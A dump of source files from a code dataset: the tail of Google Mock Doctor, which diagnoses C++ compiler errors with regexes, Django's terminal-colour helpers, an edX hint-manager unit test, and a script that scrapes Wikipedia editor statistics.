r'\'testing::internal::DoBothAction<.*>'
r'::operator Action<(?P<return_type>.*) \(.*\)>\' '
r'requested here')
diagnosis = """
You are using an action that returns %(return_type)s, but it needs to return
void. Please use a void-returning action instead.
All actions but the last in DoAll(...) must return void. Perhaps you need
to re-arrange the order of actions in a DoAll(), if you are using one?"""
return _GenericDiagnoser(
'NRN',
'Need to Return Nothing',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _IncompleteByReferenceArgumentDiagnoser(msg):
"""Diagnoses the IBRA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to incomplete type \'(?P<type>.*)\'')
clang_regex = (r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to an incomplete type '
r'\'(?P<type>.*)( const)?\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of member function '
r'\'testing::internal2::TypeWithoutFormatter<.*>::'
r'PrintValue\' requested here')
diagnosis = """
In order to mock this function, Google Mock needs to see the definition
of type "%(type)s" - declaration alone is not enough. Either #include
the header that defines it, or change the argument to be passed
by pointer."""
return _GenericDiagnoser('IBRA', 'Incomplete By-Reference Argument Type',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionMatcherDiagnoser(msg):
"""Diagnoses the OFM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly\(<unresolved overloaded function type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly')
diagnosis = """
The argument you gave to Truly() is an overloaded function. Please tell
your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool Foo(int n);
you should write
Truly(static_cast<bool (*)(int n)>(Foo))"""
return _GenericDiagnoser('OFM', 'Overloaded Function Matcher',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionActionDiagnoser(msg):
"""Diagnoses the OFA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for call to '
r'\'Invoke\(<unresolved overloaded function type>')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching '
r'function for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-generated-actions\.h:\d+:\d+:\s+'
r'note: candidate template ignored:\s+'
r'couldn\'t infer template argument \'FunctionImpl\'')
diagnosis = """
Function you are passing to Invoke is overloaded. Please tell your compiler
which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool MyFunction(int n, double x);
you should write something like
Invoke(static_cast<bool (*)(int n, double x)>(MyFunction))"""
return _GenericDiagnoser('OFA', 'Overloaded Function Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedMethodActionDiagnoser(msg):
"""Diagnoses the OMA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Invoke\(.+, <unresolved overloaded function '
r'type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function '
r'for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-generated-actions\.h:\d+:\d+: '
r'note: candidate function template not viable: '
r'requires .*, but 2 (arguments )?were provided')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _MockObjectPointerDiagnoser(msg):
"""Diagnoses the MOP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: request for member '
r'\'gmock_(?P<method>.+)\' in \'(?P<mock_object>.+)\', '
r'which is of non-class type \'(.*::)*(?P<class_name>.+)\*\'')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: member reference type '
r'\'(?P<class_name>.*?) *\' is a pointer; '
r'(did you mean|maybe you meant) to use \'->\'\?')
diagnosis = """
The first argument to ON_CALL() and EXPECT_CALL() must be a mock *object*,
not a *pointer* to it. Please write '*(%(mock_object)s)' instead of
'%(mock_object)s' as your first argument.
For example, given the mock class:
class %(class_name)s : public ... {
...
MOCK_METHOD0(%(method)s, ...);
};
and the following mock instance:
%(class_name)s* mock_ptr = ...
you should use the EXPECT_CALL like this:
EXPECT_CALL(*mock_ptr, %(method)s(...));"""
return _GenericDiagnoser(
'MOP',
'Mock Object Pointer',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis % {'mock_object': 'mock_object',
'method': 'method',
'class_name': '%(class_name)s'})],
msg)
def _NeedToUseSymbolDiagnoser(msg):
"""Diagnoses the NUS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: \'(?P<symbol>.+)\' '
r'(was not declared in this scope|has not been declared)')
clang_regex = (_CLANG_FILE_LINE_RE +
r'error: (use of undeclared identifier|unknown type name|'
r'no template named) \'(?P<symbol>[^\']+)\'')
diagnosis = """
'%(symbol)s' is defined by Google Mock in the testing namespace.
Did you forget to write
using testing::%(symbol)s;
?"""
for m in (list(_FindAllMatches(gcc_regex, msg)) +
list(_FindAllMatches(clang_regex, msg))):
symbol = m.groupdict()['symbol']
if symbol in _COMMON_GMOCK_SYMBOLS:
yield ('NUS', 'Need to Use Symbol', diagnosis % m.groupdict())
def _NeedToUseReturnNullDiagnoser(msg):
"""Diagnoses the NRNULL disease, given the error messages by the compiler."""
gcc_regex = ('instantiated from \'testing::internal::ReturnAction<R>'
'::operator testing::Action<Func>\(\) const.*\n' +
_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*error: no matching function for call to \'ImplicitCast_\('
r'(:?long )?int&\)')
clang_regex = (r'\bgmock-actions.h:.* error: no matching function for '
r'call to \'ImplicitCast_\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(int|long)>::operator '
r'Action<(?P<type>.*)\(\)>\' requested here')
diagnosis = """
You are probably calling Return(NULL) and the compiler isn't sure how to turn
NULL into %(type)s. Use ReturnNull() instead.
Note: the line number may be off; please fix all instances of Return(NULL)."""
return _GenericDiagnoser(
'NRNULL', 'Need to use ReturnNull',
[(clang_regex, diagnosis),
(gcc_regex, diagnosis % {'type': 'the right type'})],
msg)
def _TypeInTemplatedBaseDiagnoser(msg):
"""Diagnoses the TTB disease, given the error messages by the compiler."""
# This version works when the type is used as the mock function's return
# type.
gcc_4_3_1_regex_type_in_retval = (
r'In member function \'int .*\n' + _GCC_FILE_LINE_RE +
r'error: a function call cannot appear in a constant-expression')
gcc_4_4_0_regex_type_in_retval = (
r'error: a function call cannot appear in a constant-expression'
+ _GCC_FILE_LINE_RE + r'error: template argument 1 is invalid\n')
# This version works when the type is used as the mock function's sole
# parameter type.
gcc_regex_type_of_sole_param = (
_GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n')
# This version works when the type is used as a parameter of a mock
# function that has multiple parameters.
gcc_regex_type_of_a_param = (
r'error: expected `;\' before \'::\' token\n'
+ _GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n'
r'.*error: \'.+\' was not declared in this scope')
clang_regex_type_of_retval_or_sole_param = (
_CLANG_FILE_LINE_RE +
r'error: use of undeclared identifier \'(?P<type>.*)\'\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):\d+: error: '
r'non-friend class member \'Result\' cannot have a qualified name'
)
clang_regex_type_of_a_param = (
_CLANG_FILE_LINE_RE +
r'error: C\+\+ requires a type specifier for all declarations\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: '
r'C\+\+ requires a type specifier for all declarations'
)
clang_regex_unknown_type = (
_CLANG_FILE_LINE_RE +
r'error: unknown type name \'(?P<type>[^\']+)\''
)
diagnosis = """
In a mock class template, types or typedefs defined in the base class
template are *not* automatically visible. This is how C++ works. Before
you can use a type or typedef named %(type)s defined in base class Base<T>, you
need to make it visible. One way to do it is:
typedef typename Base<T>::%(type)s %(type)s;"""
for diag in _GenericDiagnoser(
'TTB', 'Type in Template Base',
[(gcc_4_3_1_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_4_4_0_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_regex_type_of_sole_param, diagnosis),
(gcc_regex_type_of_a_param, diagnosis),
(clang_regex_type_of_retval_or_sole_param, diagnosis),
(clang_regex_type_of_a_param, diagnosis % {'type': 'Foo'})],
msg):
yield diag
# Avoid overlap with the NUS pattern.
for m in _FindAllMatches(clang_regex_unknown_type, msg):
type_ = m.groupdict()['type']
if type_ not in _COMMON_GMOCK_SYMBOLS:
yield ('TTB', 'Type in Template Base', diagnosis % m.groupdict())
def _WrongMockMethodMacroDiagnoser(msg):
"""Diagnoses the WMM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'.*this_method_does_not_take_(?P<wrong_args>\d+)_argument.*\n'
r'.*\n'
r'.*candidates are.*FunctionMocker<[^>]+A(?P<args>\d+)\)>')
clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'error:.*array.*negative.*r?\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: too few arguments '
r'to function call, expected (?P<args>\d+), '
r'have (?P<wrong_args>\d+)')
clang11_re = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'.*this_method_does_not_take_'
r'(?P<wrong_args>\d+)_argument.*')
diagnosis = """
You are using MOCK_METHOD%(wrong_args)s to define a mock method that has
%(args)s arguments. Use MOCK_METHOD%(args)s (or MOCK_CONST_METHOD%(args)s,
MOCK_METHOD%(args)s_T, MOCK_CONST_METHOD%(args)s_T as appropriate) instead."""
return _GenericDiagnoser('WMM', 'Wrong MOCK_METHODn Macro',
[(gcc_regex, diagnosis),
(clang11_re, diagnosis % {'wrong_args': 'm',
'args': 'n'}),
(clang_regex, diagnosis)],
msg)
def _WrongParenPositionDiagnoser(msg):
"""Diagnoses the WPP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'error:.*testing::internal::MockSpec<.* has no member named \''
r'(?P<method>\w+)\'')
clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'error: no member named \'(?P<method>\w+)\' in '
r'\'testing::internal::MockSpec<.*>\'')
diagnosis = """
The closing parenthesis of ON_CALL or EXPECT_CALL should be *before*
".%(method)s". For example, you should write:
EXPECT_CALL(my_mock, Foo(_)).%(method)s(...);
instead of:
EXPECT_CALL(my_mock, Foo(_).%(method)s(...));"""
return _GenericDiagnoser('WPP', 'Wrong Parenthesis Position',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
_DIAGNOSERS = [
_IncompleteByReferenceArgumentDiagnoser,
_MockObjectPointerDiagnoser,
_NeedToReturnNothingDiagnoser,
_NeedToReturnReferenceDiagnoser,
_NeedToReturnSomethingDiagnoser,
_NeedToUseReturnNullDiagnoser,
_NeedToUseSymbolDiagnoser,
_OverloadedFunctionActionDiagnoser,
_OverloadedFunctionMatcherDiagnoser,
_OverloadedMethodActionDiagnoser,
_TypeInTemplatedBaseDiagnoser,
_WrongMockMethodMacroDiagnoser,
_WrongParenPositionDiagnoser,
]
def Diagnose(msg):
"""Generates all possible diagnoses given the compiler error message."""
msg = re.sub(r'\x1b\[[^m]*m', '', msg) # Strips all color formatting.
# Assuming the string is using the UTF-8 encoding, replaces the left and
# the right single quote characters with apostrophes.
msg = re.sub(r'(\xe2\x80\x98|\xe2\x80\x99)', "'", msg)
diagnoses = []
for diagnoser in _DIAGNOSERS:
for diag in diagnoser(msg):
diagnosis = '[%s - %s]\n%s' % diag
if not diagnosis in diagnoses:
diagnoses.append(diagnosis)
return diagnoses
def main():
print ('Google Mock Doctor v%s - '
'diagnoses problems in code using Google Mock.' % _VERSION)
if sys.stdin.isatty():
print ('Please copy and paste the compiler errors here. Press c-D when '
'you are done:')
else:
print 'Waiting for compiler errors on stdin . . .'
msg = sys.stdin.read().strip()
diagnoses = Diagnose(msg)
count = len(diagnoses)
if not count:
print ("""
Your compiler complained:
8<------------------------------------------------------------
%s
------------------------------------------------------------>8
Uh-oh, I'm not smart enough to figure out what the problem is. :-(
However...
If you send your source code and the compiler's error messages to
%s, you can be helped and I can get smarter --
win-win for us!""" % (msg, _EMAIL))
else:
print '------------------------------------------------------------'
print 'Your code appears to have the following',
if count > 1:
print '%s diseases:' % (count,)
else:
print 'disease:'
i = 0
for d in diagnoses:
i += 1
if count > 1:
print '\n#%s:' % (i,)
print d
print ("""
How did I do? If you think I'm wrong or unhelpful, please send your
source code and the compiler's error messages to %s.
Then you can be helped and I can get smarter -- I promise I won't be upset!""" %
_EMAIL)
if __name__ == '__main__':
main()
| bsd-3-clause |
carlmw/oscar-wager | django/utils/termcolors.py | 417 | 6885 | """
termcolors.py
"""
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = dict([(color_names[x], '3%s' % x) for x in range(8)])
background = dict([(color_names[x], '4%s' % x) for x in range(8)])
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print colorize('first line', fg='red', opts=('noreset',))
print 'this should be red too'
print colorize('and so should this')
print 'this should not be red'
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in kwargs.iteritems():
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = text + '\x1b[%sm' % RESET
return ('\x1b[%sm' % ';'.join(code_list)) + text
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print bold_red('hello')
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
},
DARK_PALETTE: {
'ERROR': { 'fg': 'red', 'opts': ('bold',) },
'NOTICE': { 'fg': 'red' },
'SQL_FIELD': { 'fg': 'green', 'opts': ('bold',) },
'SQL_COLTYPE': { 'fg': 'green' },
'SQL_KEYWORD': { 'fg': 'yellow' },
'SQL_TABLE': { 'opts': ('bold',) },
'HTTP_INFO': { 'opts': ('bold',) },
'HTTP_SUCCESS': { },
'HTTP_REDIRECT': { 'fg': 'green' },
'HTTP_NOT_MODIFIED': { 'fg': 'cyan' },
'HTTP_BAD_REQUEST': { 'fg': 'red', 'opts': ('bold',) },
'HTTP_NOT_FOUND': { 'fg': 'yellow' },
'HTTP_SERVER_ERROR': { 'fg': 'magenta', 'opts': ('bold',) },
},
LIGHT_PALETTE: {
'ERROR': { 'fg': 'red', 'opts': ('bold',) },
'NOTICE': { 'fg': 'red' },
'SQL_FIELD': { 'fg': 'green', 'opts': ('bold',) },
'SQL_COLTYPE': { 'fg': 'green' },
'SQL_KEYWORD': { 'fg': 'blue' },
'SQL_TABLE': { 'opts': ('bold',) },
'HTTP_INFO': { 'opts': ('bold',) },
'HTTP_SUCCESS': { },
'HTTP_REDIRECT': { 'fg': 'green', 'opts': ('bold',) },
'HTTP_NOT_MODIFIED': { 'fg': 'green' },
'HTTP_BAD_REQUEST': { 'fg': 'red', 'opts': ('bold',) },
'HTTP_NOT_FOUND': { 'fg': 'red' },
'HTTP_SERVER_ERROR': { 'fg': 'magenta', 'opts': ('bold',) },
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
The general form of a pallete definition is:
"palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
where:
palette is a named palette; one of 'light', 'dark', or 'nocolor'.
role is a named style used by Django
fg is a background color.
bg is a background color.
option is a display options.
Specifying a named palette is the same as manually specifying the individual
definitions for each role. Any individual definitions following the pallete
definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# The first instruction can contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
| bsd-3-clause |
abo-abo/edx-platform | lms/djangoapps/instructor/tests/test_hint_manager.py | 31 | 9180 | import json
from django.test.client import Client, RequestFactory
from django.test.utils import override_settings
from mock import patch, MagicMock
from courseware.models import XModuleUserStateSummaryField
from courseware.tests.factories import UserStateSummaryFactory
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
import instructor.hint_manager as view
from student.tests.factories import UserFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class HintManagerTest(ModuleStoreTestCase):
def setUp(self):
"""
Makes a course, which will be the same for all tests.
Set up mako middleware, which is necessary for template rendering to happen.
"""
self.course = CourseFactory.create(org='Me', number='19.002', display_name='test_course')
self.url = '/courses/Me/19.002/test_course/hint_manager'
self.user = UserFactory.create(username='robot', email='[email protected]', password='test', is_staff=True)
self.c = Client()
self.c.login(username='robot', password='test')
self.problem_id = 'i4x://Me/19.002/crowdsource_hinter/crowdsource_hinter_001'
self.course_id = 'Me/19.002/test_course'
UserStateSummaryFactory.create(field_name='hints',
usage_id=self.problem_id,
value=json.dumps({'1.0': {'1': ['Hint 1', 2],
'3': ['Hint 3', 12]},
'2.0': {'4': ['Hint 4', 3]}
}))
UserStateSummaryFactory.create(field_name='mod_queue',
usage_id=self.problem_id,
value=json.dumps({'2.0': {'2': ['Hint 2', 1]}}))
UserStateSummaryFactory.create(field_name='hint_pk',
usage_id=self.problem_id,
value=5)
# Mock out location_to_problem_name, which ordinarily accesses the modulestore.
# (I can't figure out how to get fake structures into the modulestore.)
view.location_to_problem_name = lambda course_id, loc: "Test problem"
def test_student_block(self):
"""
Makes sure that students cannot see the hint management view.
"""
c = Client()
UserFactory.create(username='student', email='[email protected]', password='test')
c.login(username='student', password='test')
out = c.get(self.url)
print out
self.assertTrue('Sorry, but students are not allowed to access the hint manager!' in out.content)
def test_staff_access(self):
"""
Makes sure that staff can access the hint management view.
"""
out = self.c.get('/courses/Me/19.002/test_course/hint_manager')
print out
self.assertTrue('Hints Awaiting Moderation' in out.content)
def test_invalid_field_access(self):
"""
Makes sure that field names other than 'mod_queue' and 'hints' are
rejected.
"""
out = self.c.post(self.url, {'op': 'delete hints', 'field': 'all your private data'})
print out
self.assertTrue('an invalid field was accessed' in out.content)
def test_switchfields(self):
"""
Checks that the op: 'switch fields' POST request works.
"""
out = self.c.post(self.url, {'op': 'switch fields', 'field': 'mod_queue'})
print out
self.assertTrue('Hint 2' in out.content)
def test_gethints(self):
"""
Checks that gethints returns the right data.
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue'})
out = view.get_hints(post, self.course_id, 'mod_queue')
print out
self.assertTrue(out['other_field'] == 'hints')
expected = {self.problem_id: [(u'2.0', {u'2': [u'Hint 2', 1]})]}
self.assertTrue(out['all_hints'] == expected)
def test_gethints_other(self):
"""
Same as above, with hints instead of mod_queue
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'hints'})
out = view.get_hints(post, self.course_id, 'hints')
print out
self.assertTrue(out['other_field'] == 'mod_queue')
expected = {self.problem_id: [('1.0', {'1': ['Hint 1', 2],
'3': ['Hint 3', 12]}),
('2.0', {'4': ['Hint 4', 3]})
]}
self.assertTrue(out['all_hints'] == expected)
def test_deletehints(self):
"""
Checks that delete_hints deletes the right stuff.
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'hints',
'op': 'delete hints',
1: [self.problem_id, '1.0', '1']})
view.delete_hints(post, self.course_id, 'hints')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=self.problem_id).value
self.assertTrue('1' not in json.loads(problem_hints)['1.0'])
def test_changevotes(self):
"""
Checks that vote changing works.
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'hints',
'op': 'change votes',
1: [self.problem_id, '1.0', '1', 5]})
view.change_votes(post, self.course_id, 'hints')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=self.problem_id).value
# hints[answer][hint_pk (string)] = [hint text, vote count]
print json.loads(problem_hints)['1.0']['1']
self.assertTrue(json.loads(problem_hints)['1.0']['1'][1] == 5)
def test_addhint(self):
"""
Check that instructors can add new hints.
"""
# Because add_hint accesses the xmodule, this test requires a bunch
# of monkey patching.
hinter = MagicMock()
hinter.validate_answer = lambda string: True
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue',
'op': 'add hint',
'problem': self.problem_id,
'answer': '3.14',
'hint': 'This is a new hint.'})
post.user = 'fake user'
with patch('courseware.module_render.get_module', MagicMock(return_value=hinter)):
with patch('courseware.model_data.FieldDataCache', MagicMock(return_value=None)):
view.add_hint(post, self.course_id, 'mod_queue')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='mod_queue', usage_id=self.problem_id).value
self.assertTrue('3.14' in json.loads(problem_hints))
def test_addbadhint(self):
"""
Check that instructors cannot add hints with unparsable answers.
"""
# Patching.
hinter = MagicMock()
hinter.validate_answer = lambda string: False
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue',
'op': 'add hint',
'problem': self.problem_id,
'answer': 'fish',
'hint': 'This is a new hint.'})
post.user = 'fake user'
with patch('courseware.module_render.get_module', MagicMock(return_value=hinter)):
with patch('courseware.model_data.FieldDataCache', MagicMock(return_value=None)):
view.add_hint(post, self.course_id, 'mod_queue')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='mod_queue', usage_id=self.problem_id).value
self.assertTrue('fish' not in json.loads(problem_hints))
def test_approve(self):
"""
Check that instructors can approve hints. (Move them
from the mod_queue to the hints.)
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue',
'op': 'approve',
1: [self.problem_id, '2.0', '2']})
view.approve(post, self.course_id, 'mod_queue')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='mod_queue', usage_id=self.problem_id).value
self.assertTrue('2.0' not in json.loads(problem_hints) or len(json.loads(problem_hints)['2.0']) == 0)
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=self.problem_id).value
self.assertTrue(json.loads(problem_hints)['2.0']['2'] == ['Hint 2', 1])
self.assertTrue(len(json.loads(problem_hints)['2.0']) == 2)
| agpl-3.0 |
louisdijkstra/chemical-youth | bin/scrape-users.py | 1 | 5646 | #!/usr/bin/env python
from __future__ import print_function, division
from optparse import OptionParser
import os
import sys
# add the python directory
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__))[:-3] + 'python')
from WikipediaScraper import *
__author__ = "Louis Dijkstra"
usage = """%prog <title> <output.csv>
<title> title of the wikipedia page to be crawled or a
file with a list of titles (every row a different
title)
<output.csv> output file location
Scraps the users that made revisions to the Wikipedia pages whos title
are given in the <title> argument. The output is stored in CSV format
(tab-delimited). It contains the following columns:
name - title of the page
user - the user name or ip that made a revision
n_edits - the total number of edits that user made
n_minor_edits - the number of minor edits that user made
first_edit - the time of the first edit
last_edit - the time of the last edit
added_bytes - the total number of bytes added
"""
USER_AGENT = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
GET_DATA_SUCCESS = 1
GET_DATA_FAILURE = 0
def printHeader(file):
print("name\tuser\tn_edits\tn_minor_edits\tfirst_edit\tlast_edit\tadded_bytes", file=file)
def get_data(raw_data, name, file = sys.stdout):
"""
Processes the raw data from the website and outputs
the data of interest
"""
raw_data = raw_data.splitlines() # split it in lines
# print(raw_data)
# go to the table of relevance
i = 0
line = raw_data[i]
while not 'Added (Bytes)' in line:
i += 1
try:
line = raw_data[i]
except:
return GET_DATA_FAILURE
i += 3 # get to the starting point of the list
line = raw_data[i]
while len(line) != 0: # not the end of the table
print(name, end='\t', file=file)
print(line.strip(), end='\t', file=file) # user name
i += 5
line = raw_data[i]
print(line.strip(), end='\t', file=file) # number of edits
i += 1
line = raw_data[i]
print(line.strip(), end='\t', file=file) # number of minor edits
i += 2
line = raw_data[i]
print(line.strip(), end='\t', file=file) # first edit
i += 1
line = raw_data[i]
print(line.strip(), end='\t', file=file) # last edit
i += 2
line = raw_data[i]
print(line.strip(), file=file) # added_bytes
i += 3
line = raw_data[i]
return GET_DATA_SUCCESS
def sleep(options):
if options.sleep != None:
time.sleep(options.sleep)
if options.verbose:
print('Sleeping for %d seconds...'%options.sleep)
def main():
parser = OptionParser(usage=usage)
parser.add_option("--file", "-f", action="store", dest="file", default=None,
help="A file with pages scraped already. When given, scrawled page are not scrawled again (Default: None)")
parser.add_option("--sleep", "-s", action="store", dest="sleep", default=None, type=float,
help="Sleep time scraping two pages. (Default: no sleep)")
parser.add_option("--top", "-t", action="store", dest="top", default=10000, type=int,
help="Number of top users to be scraped. (Default: 10000)")
parser.add_option("-v", action="store_true", dest="verbose", default=False,
help="verbose.")
(options, args) = parser.parse_args()
# process arguments
if (len(args)!=2):
parser.print_help()
return 1
# get the links to be scraped
already_scraped = set()
if options.file != None:
oldfile = open(options.file, 'r')
next(oldfile) # ignore header
for line in oldfile:
line = line.split()
already_scraped.add(line[0].strip())
try: # in case a file is passed as the first argument
linkfile = open(args[0], 'r')
names, links = [], []
for name in linkfile:
name = name.strip()
if name in already_scraped:
continue
link = "https://tools.wmflabs.org/xtools-articleinfo/?article=" + name.strip() + "&project=en.wikipedia.org&editorlimit=" + str(options.top) + "#topeditors"
# add to the lists
names.append(name)
links.append(link)
except: # in case just one title is given
names, links = [args[0]], ["https://tools.wmflabs.org/xtools-articleinfo/?article=" + args[0] + "&project=en.wikipedia.org&editorlimit=" + str(options.top) + "#topeditors"]
outputfilename = args[1]
if options.verbose: # prints the list of pages to be scraped
print("\nList of pages to be scraped:\n")
print("title\t\tlink")
print("-----\t\t----")
for name, link in zip(names, links):
print("%s\t\t%s"%(name, link))
print("-----\t\t----\n\n")
i = 0
n_links = len(links)
outputfile = open(outputfilename, 'w')
printHeader(outputfile)
list_names_failed = []
# go through all the wikipedia links
for name, link in zip(names, links):
if options.verbose:
i += 1
print('%d of %d links processed (%.2f %%)\t%d of %d links failed (%.2f %%)'%(i, n_links, float(i) / float(n_links) * 100, len(list_names_failed), i, float(len(list_names_failed)) / float(i) * 100))
print("Continuing with scraping %s (link: %s)"%(name, link))
# get the raw data
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
data = readInDataFromURL(link, headers=USER_AGENT)
flag = get_data(data, name, file=outputfile)
if flag == GET_DATA_FAILURE:
list_names_failed.append(name)
sleep(options)
if options.verbose:
print(" DONE")
# print list of failed names:
print('\npages that failed:\n\n')
for page in list_names_failed:
print(page)
if __name__ == '__main__':
sys.exit(main()) | mit |
